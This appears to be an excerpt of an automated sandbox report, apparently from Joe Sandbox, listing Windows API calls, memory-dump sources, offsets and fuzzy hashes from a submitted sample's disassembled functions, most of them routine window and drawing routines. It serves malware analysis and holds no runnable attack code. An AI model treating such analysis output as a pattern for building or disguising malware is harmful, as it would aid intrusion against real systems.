                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000104,?,001CB85B,?,?,?,?,?,00000000,00000000), ref: 001CB412
                                                                  • GetProcAddress.KERNEL32(00000000,FindFirstFileTransactedW), ref: 001CB422
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: FindFirstFileTransactedW$kernel32.dll
                                                                  • API String ID: 1646373207-2878570079
                                                                  • Opcode ID: 88b34b17be86a25c436a144d9736c53e1d0ef0dedfacda14a15f9c4da8934b5d
                                                                  • Instruction ID: 6bce3c80b0a9db6d90c6cd477249d8a3b305d168990e3b68a303d752e93c65b0
                                                                  • Opcode Fuzzy Hash: 88b34b17be86a25c436a144d9736c53e1d0ef0dedfacda14a15f9c4da8934b5d
                                                                  • Instruction Fuzzy Hash: 09F0E23214C140F787351A4BAC89C5BBB6AFAE1F22724852FF09AD1051CB3188A0CE61
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 0021A508
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  • IsIconic.USER32(?), ref: 0021A531
                                                                  • GetParent.USER32(?), ref: 0021A53E
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Parent$Exception@8H_prolog3IconicThrow
                                                                  • String ID:
                                                                  • API String ID: 144390861-0
                                                                  • Opcode ID: d8f8e06d7c3b3067b43b73dcf165f451c03d91e5bf192ffe584fd6f9181efef6
                                                                  • Instruction ID: bfd9005fec1d49b431894cb108df11528b13b1f513d1e5b9d91da24c0fd3e829
                                                                  • Opcode Fuzzy Hash: d8f8e06d7c3b3067b43b73dcf165f451c03d91e5bf192ffe584fd6f9181efef6
                                                                  • Instruction Fuzzy Hash: AFF0C832719206BB8B212A72AC44A6A7A9FEFB03A07514026F80992510EF30DC609691
                                                                  APIs
                                                                  • GetKeyState.USER32(00000010), ref: 00212100
                                                                  • GetKeyState.USER32(00000011), ref: 00212109
                                                                  • GetKeyState.USER32(00000012), ref: 00212112
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: State
                                                                  • String ID:
                                                                  • API String ID: 1649606143-0
                                                                  • Opcode ID: 0e5cb0e2512d8cc408eded3ef4e4be26550ec8a2aa7222529a2adce9cf88b421
                                                                  • Instruction ID: 0363c789b718e9eb1a25aae18ba6e25b47827b0d3dfbe990a307462cb170d7f2
                                                                  • Opcode Fuzzy Hash: 0e5cb0e2512d8cc408eded3ef4e4be26550ec8a2aa7222529a2adce9cf88b421
                                                                  • Instruction Fuzzy Hash: 72F0A03526027EEAEB10E6E09D02BE07AD58B20780F148061FB4C7B043CAB0A9B586A0
                                                                  APIs
                                                                  • IsIconic.USER32(?), ref: 00214657
                                                                  • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 002146A7
                                                                    • Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: IconicLongMessagePostWindow
                                                                  • String ID:
                                                                  • API String ID: 1855654840-0
                                                                  • Opcode ID: d2bcdb541af6a76d7a081dfc6bf2b75341341eedd24af4814191213bf2461b55
                                                                  • Instruction ID: 91fcf5d2cf09f3d1c8bc3b07e68cce1aafbe10f46e3ae04e96adc8f2a56edb09
                                                                  • Opcode Fuzzy Hash: d2bcdb541af6a76d7a081dfc6bf2b75341341eedd24af4814191213bf2461b55
                                                                  • Instruction Fuzzy Hash: CB11A173270B824FD738AE38DD85BE672DAEB76318F180A2AE05DC61D1D764DCA08610
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: IconicVisibleWindow
                                                                  • String ID:
                                                                  • API String ID: 1797901696-0
                                                                  • Opcode ID: b50bf04fdc4903a29d90d0c8bd2aedf4de360faf78661a70955876909d70bcda
                                                                  • Instruction ID: e35ea8e2ac448caed65b7d240a0961f8567766ee3660e8434922772dcad69662
                                                                  • Opcode Fuzzy Hash: b50bf04fdc4903a29d90d0c8bd2aedf4de360faf78661a70955876909d70bcda
                                                                  • Instruction Fuzzy Hash: 3AF0893332071577CB311A2A9C4991FF66E9FD2B70714032AF5AD925F2EE709C638594
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 001CD399
                                                                  • CoCreateInstance.OLE32(00311F68,00000000,00000001,002E987C,003332AC,-0000043C,?,?,001DF56F,00000000,?,00215930), ref: 001CD3B7
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInitializeInstance
                                                                  • String ID:
                                                                  • API String ID: 3519745914-0
                                                                  • Opcode ID: 8e0093ceed7cd4512392f7da3f0d35acda900e3e849706cd76393a3ed4940e64
                                                                  • Instruction ID: 45f86d57ded8fdb2bf0a0c9975a7d7cba6d1514d759e3b18e26b713c4aa811ae
                                                                  • Opcode Fuzzy Hash: 8e0093ceed7cd4512392f7da3f0d35acda900e3e849706cd76393a3ed4940e64
                                                                  • Instruction Fuzzy Hash: 7FF05EB5680281ABD7209E51BCC8FE677A5FBE4305F64243DE245AA141C772A882CB52
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ForegroundIconicWindow
                                                                  • String ID:
                                                                  • API String ID: 1248896474-0
                                                                  • Opcode ID: 8836623d4dffddc1aef405bd2f15991f040b4fc750693d0940bdf49e4b94a367
                                                                  • Instruction ID: bac954dd1d5095682e1fc199c7e2e28c702725ae5a251b55fce2215000082951
                                                                  • Opcode Fuzzy Hash: 8836623d4dffddc1aef405bd2f15991f040b4fc750693d0940bdf49e4b94a367
                                                                  • Instruction Fuzzy Hash: 1AE023322449905BD6312765BC49F2E7A75EFDC731B15026AF4598A1F1DF60CC518750
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Iconic
                                                                  • String ID:
                                                                  • API String ID: 110040809-0
                                                                  • Opcode ID: db1caf6595ddf380ca640c0258b2aa97ca57cb124d2641d96d16bdf08b47b39b
                                                                  • Instruction ID: 596bec179b5f8b9c82b14f0467ce187a9eec105d0b16990ab7f6270fba4ccd27
                                                                  • Opcode Fuzzy Hash: db1caf6595ddf380ca640c0258b2aa97ca57cb124d2641d96d16bdf08b47b39b
                                                                  • Instruction Fuzzy Hash: CFE0DF323AC9416AD7266A39BC86E3B2ADAEBD8B21B14022DF45AC25D0DF50DC028610
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                  • Instruction ID: 39ec02ae6bc94b89ff85b9336ceec202f637bfa0c7692a9472b458cbc0d7ef22
                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                  • Instruction Fuzzy Hash: 011138B723104383DE148E3DC8B46F7A396EAC53A0B3F836AC0498B758D232AD61A500
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 0023733F
                                                                  • GetModuleFileNameW.KERNEL32(00000000,002062A3,00000104,?,00000A90,002378F3,?,00000000,00000084,00237D9A,0000000A,0000000A,0000000A,00000000,00000014,0028FFC9), ref: 002373EE
                                                                  • __wsplitpath_s.LIBCMT ref: 0023741A
                                                                  • __wsplitpath_s.LIBCMT ref: 00237439
                                                                  • __wmakepath_s.LIBCMT ref: 00237466
                                                                  • _wcslen.LIBCMT ref: 00237472
                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000A90,002378F3,?,00000000,00000084,00237D9A,0000000A,0000000A), ref: 002374AA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: File__wsplitpath_s$CreateH_prolog3_ModuleName__wmakepath_s_wcslen
                                                                  • String ID:
                                                                  • API String ID: 1221639053-3916222277
                                                                  • Opcode ID: a94b123d75eb9b85c360c3d77a036f74d4a911d21d7bd8a78c34a8516a7605f2
                                                                  • Instruction ID: d2b296da84d1495d083e5cca6b50ca728ab19722411509e125518618154d3971
                                                                  • Opcode Fuzzy Hash: a94b123d75eb9b85c360c3d77a036f74d4a911d21d7bd8a78c34a8516a7605f2
                                                                  • Instruction Fuzzy Hash: 64D128B1A10329AFCF21AF60CD85BADBB79BB1A314F1004E9F50AA2551DB705F94DF12
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 001FA68C
                                                                  • PtInRect.USER32(?,?,?), ref: 001FA6A2
                                                                  • GetClientRect.USER32(?,?), ref: 001FA6BF
                                                                  • PtInRect.USER32(?,?,?), ref: 001FA6DA
                                                                  • GetSystemMetrics.USER32(0000000D), ref: 001FA706
                                                                  • GetSystemMetrics.USER32(0000000E), ref: 001FA711
                                                                  • PtInRect.USER32(?,?,?), ref: 001FA755
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$MetricsSystem$ClientWindow
                                                                  • String ID:
                                                                  • API String ID: 2286436557-0
                                                                  • Opcode ID: 02ed02dae9636a56f27b52a3ef70d577ede6de7eff76cf6a79ba183c0e8fb256
                                                                  • Instruction ID: 806f6d77f0f6065f78c72b2625c1de55543de81ef3c8007fef91bac88e5be9ed
                                                                  • Opcode Fuzzy Hash: 02ed02dae9636a56f27b52a3ef70d577ede6de7eff76cf6a79ba183c0e8fb256
                                                                  • Instruction Fuzzy Hash: 47F1E7B1A0020EAFDF05DFA4CD84DEEBBB9AF48344F104529E619E7250DB35EA05CB61
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 001EACAE
                                                                  • GetParent.USER32(?), ref: 001EAD09
                                                                  • GetParent.USER32(?), ref: 001EAD25
                                                                  • UpdateWindow.USER32(?), ref: 001EAD6D
                                                                  • SetCursor.USER32(?,00000000), ref: 001EAD92
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 001EADF4
                                                                  • UpdateWindow.USER32(?), ref: 001EAEFA
                                                                  • InflateRect.USER32(?,00000002,00000002), ref: 001EAF5A
                                                                  • SetCapture.USER32(?), ref: 001EAF63
                                                                  • SetCursor.USER32(00000000), ref: 001EAF7B
                                                                  • IsWindow.USER32(?), ref: 001EB019
                                                                  • GetCursorPos.USER32(?), ref: 001EB058
                                                                  • ScreenToClient.USER32(?,?), ref: 001EB065
                                                                  • PtInRect.USER32(?,?,?), ref: 001EB081
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000505,?,?,?,?,?,?,?,00000000), ref: 001EB0F5
                                                                  • GetParent.USER32(?), ref: 001EB110
                                                                  • GetParent.USER32(?), ref: 001EB124
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000505,00000000,?,?,?,?,?,?,?,00000000), ref: 001EB136
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000505,?,?,?,?,?,?,?,00000000), ref: 001EB158
                                                                  • GetParent.USER32(?), ref: 001EB161
                                                                  • GetParent.USER32(?), ref: 001EB17C
                                                                  • GetParent.USER32(?), ref: 001EB187
                                                                  • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?,?,00000000), ref: 001EB1BF
                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000505,00000000,?,00000000,?,?,?,?,?,?,00000000), ref: 001EB2F7
                                                                    • Part of subcall function 001E83AB: InvalidateRect.USER32(?,?,00000001,?), ref: 001E8420
                                                                    • Part of subcall function 001E83AB: InflateRect.USER32(?,?,?), ref: 001E8466
                                                                    • Part of subcall function 001E83AB: RedrawWindow.USER32(?,?,00000000,00000401,?,?), ref: 001E8479
                                                                  • UpdateWindow.USER32(?), ref: 001EB257
                                                                  • UpdateWindow.USER32(?), ref: 001EB2B6
                                                                  • SetCapture.USER32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 001EB2C1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Parent$RectRedraw$Update$Cursor$CaptureInflateInvalidate$AsyncClientH_prolog3_ScreenState
                                                                  • String ID: 83/
                                                                  • API String ID: 991125134-2323854675
                                                                  • Opcode ID: 9b1e0cfad39aabf73fae8bdb9d797f78b1029ea6bf3d48a5057aeca9a3fab5e4
                                                                  • Instruction ID: 05b188cbc60fb5ab11745c588cab189f9df2dbec5ff523402906629f49e8dcd0
                                                                  • Opcode Fuzzy Hash: 9b1e0cfad39aabf73fae8bdb9d797f78b1029ea6bf3d48a5057aeca9a3fab5e4
                                                                  • Instruction Fuzzy Hash: C3026A74600A549FCF15AF65DCD8AAE7BB9FF08760F144279F80A9B2A6CB709940CF50
                                                                  APIs
                                                                    • Part of subcall function 001DCC18: GetWindowLongW.USER32(?,000000EC), ref: 001DCC23
                                                                  • GetClientRect.USER32(?,00000000), ref: 0020F166
                                                                  • CopyRect.USER32(?,?), ref: 0020F198
                                                                    • Part of subcall function 001D011B: ScreenToClient.USER32(?,?), ref: 001D012C
                                                                    • Part of subcall function 001D011B: ScreenToClient.USER32(?,?), ref: 001D0139
                                                                  • IntersectRect.USER32(?,?,?), ref: 0020F1E7
                                                                  • SetRectEmpty.USER32(?), ref: 0020F1F5
                                                                  • IntersectRect.USER32(?,?,?), ref: 0020F227
                                                                  • SetRectEmpty.USER32(?), ref: 0020F235
                                                                  • IsRectEmpty.USER32(?), ref: 0020F245
                                                                  • IsRectEmpty.USER32(?), ref: 0020F24F
                                                                  • GetWindowRect.USER32(?,?), ref: 0020F27A
                                                                  • GetWindowRect.USER32(?,?), ref: 0020F29D
                                                                  • UnionRect.USER32(?,?,?), ref: 0020F2BA
                                                                  • EqualRect.USER32(?,?), ref: 0020F2C8
                                                                  • GetWindowRect.USER32(?,?), ref: 0020F353
                                                                  • IsRectEmpty.USER32(?), ref: 0020F3BD
                                                                  • MapWindowPoints.USER32(?,?,?,00000002), ref: 0020F3DA
                                                                  • RedrawWindow.USER32(?,?,00000000,00000185), ref: 0020F3EE
                                                                  • IsRectEmpty.USER32(?), ref: 0020F408
                                                                  • EqualRect.USER32(?,?), ref: 0020F416
                                                                  • MapWindowPoints.USER32(?,?,?,00000002), ref: 0020F433
                                                                  • RedrawWindow.USER32(?,?,00000000,00000185), ref: 0020F447
                                                                  • UpdateWindow.USER32(?), ref: 0020F45C
                                                                  • IsRectEmpty.USER32(?), ref: 0020F4A0
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 0020F4B5
                                                                  • IsRectEmpty.USER32(?), ref: 0020F4BB
                                                                  • EqualRect.USER32(?,?), ref: 0020F4CD
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 0020F4E0
                                                                  • UpdateWindow.USER32(?), ref: 0020F4E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$Empty$ClientEqual$IntersectInvalidatePointsRedrawScreenUpdate$CopyLongUnion
                                                                  • String ID:
                                                                  • API String ID: 4119827998-0
                                                                  • Opcode ID: 62340dffc81ce6f3e85edc59ba89f3b4efb3276f6b9b44838ddf0f968821a062
                                                                  • Instruction ID: 0fcf3c4f39f571367598026f6f7d0171eb1eddbb08bee3527d59d2de8cc455e0
                                                                  • Opcode Fuzzy Hash: 62340dffc81ce6f3e85edc59ba89f3b4efb3276f6b9b44838ddf0f968821a062
                                                                  • Instruction Fuzzy Hash: 57D1EB7291021EDFCF21DFA4DA84AEEB7B9BF08300F11416AE909EB155DB71AA45CF50
                                                                  APIs
                                                                  • LoadImageW.USER32(?,?,00000000,00000000,00000000,00002000), ref: 00238818
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00238849
                                                                  • DeleteObject.GDI32(?), ref: 00238856
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0023889A
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 002388B2
                                                                  • SelectObject.GDI32(?,?), ref: 002388D8
                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 002388F6
                                                                  • SelectObject.GDI32(?,?), ref: 00238909
                                                                  • CreateCompatibleDC.GDI32(?), ref: 0023891F
